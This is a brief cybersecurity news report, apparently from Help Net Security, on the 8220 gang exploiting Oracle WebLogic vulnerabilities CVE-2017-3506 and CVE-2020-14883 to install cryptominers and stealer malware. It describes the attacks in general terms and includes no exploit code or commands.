The 8220 gang has been leveraging an old Oracle WebLogic Server vulnerability to distribute malware, the Imperva Threat Research team has found.
Active since 2017, the 8220 gang has been known for deploying cryptocurrency miners on Linux and Windows hosts by exploiting known vulnerabilities.
Earlier this year, Trend Micro researchers revealed that 8220 have been exploiting CVE-2017-3506 - another critical vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware - to gain control of the targeted systems and install cryptominers.
This time around, the gang has tried exploiting CVE-2020-14883, a critical remote code execution vulnerability in Oracle WebLogic Server.
Following the exploit, the attackers download maliciously crafted XML files, allowing code execution, and finally deploy stealer and cryptominer malware.
This Cyber News was published on www.helpnetsecurity.com. Publication date: Wed, 20 Dec 2023 13:13:08 +0000